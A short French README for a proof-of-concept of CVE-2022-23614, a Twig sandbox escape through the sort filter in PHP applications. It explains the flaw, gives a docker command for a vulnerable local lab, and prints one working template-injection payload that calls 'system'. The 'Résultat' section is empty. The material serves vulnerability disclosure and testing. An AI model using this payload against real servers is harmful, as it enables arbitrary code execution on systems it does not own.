
Exploit de preuve de concept pour CVE-2022-23614 démontrant l'exécution de code arbitraire via le contournement du bac à sable du filtre sort de Twig dans les applications PHP.
Preuve de concept pour CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (exécution de code/dépassement du bac à sable du filtre sort de Twig)
Comme vu dans ce commit - https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9, twig passait le nom de fonction fourni par l'utilisateur comme paramètre de callback à uasort (ici), menant ainsi à une exécution de code arbitraire
Pour construire et exécuter le conteneur docker avec une version vulnérable de twig
$ ./build-docker.sh
Ouvrez la page web à localhost:1337 et essayez de rendre la charge utile suivante
{{ ['id','']|sort('system') }}
Preuve de concept

Résultat
